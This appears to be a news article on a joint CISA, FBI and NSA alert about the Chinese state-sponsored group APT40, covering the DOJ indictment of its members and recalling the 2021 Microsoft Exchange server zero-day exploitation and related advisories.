The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) have observed “sophisticated Chinese state-sponsored activity” targeting multiple public and private sectors in the United States.
According to CISA, the Chinese Advanced Persistent Threat (APT) group (known also as APT40) is targeting U.S. political, economic, military, educational, and critical infrastructure personnel and their organizations.
“On July 19, 2021, the U.S. Department of Justice (DOJ) unsealed an indictment against four APT40 cyber actors for their illicit computer network exploitation (CNE) activities via front company Hainan Xiandun Technology Development Company (Hainan Xiandun). Hainan Xiandun employee Wu Shurong cooperated with and carried out orders from PRC Ministry of State Security (MSS) Hainan State Security Department (HSSD) intelligence officers Ding Xiaoyang, Zhu Yunmin, and Cheng Qingmin to conduct CNE,” CISA wrote in the alert.
“Wu’s CNE activities resulted in the theft of trade secrets, intellectual property, and other high-value information from companies and organizations in the United States and abroad, as well as from multiple foreign governments.”
According to the U.S. Department of Justice (DOJ) press release, Wu Shurong was a computer hacker who (as part of his job duties at Hainan Xiandun) “created malware, hacked into computer systems operated by foreign governments, companies and universities, and supervised other Hainan Xiandun hackers.”
CISA, FBI and NSA also released the following useful links and guidelines related to the threat:
- Microsoft Exchange server exploitation activity
- Joint Cybersecurity Advisory: Chinese Observed TTPs
- CISA Insights: Chinese Cyber Threat Overview for Leaders
- Safeguarding Critical Infrastructure against Threats from the People’s Republic of China
- China Cyber Threat Overview and Advisories.
Readers may recall earlier this year when malicious actors used zero-day exploits (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) to compromise thousands of Exchange servers around the globe.
Over the ensuing month, the DOJ authorized the FBI to then remove malicious web shells from hundreds of compromised and vulnerable Microsoft Exchange servers.
CISA also had published new reports on DearCry ransomware and China Chopper Web Shell malware linked to the Exchange Server exploits. Attackers had been using this malware to further compromise on-premise Microsoft Exchange servers and launch other attacks.
- FBI removes malicious web shells from hundreds of compromised Microsoft Exchange servers
- CISA publishes reports on DearCry ransomware and China Chopper Web Shell malware linked to Exchange Server exploits (update-2)
- Cybersecurity experts warn exploits grow ten-fold after Exchange Server zero-day vulnerabilities revealed
- FBI and CISA issue urgent joint cybersecurity advisory on Exchange server hacks
- Microsoft releases emergency patches for Exchange Server RCE vulnerabilities exploited in the wild (Updated)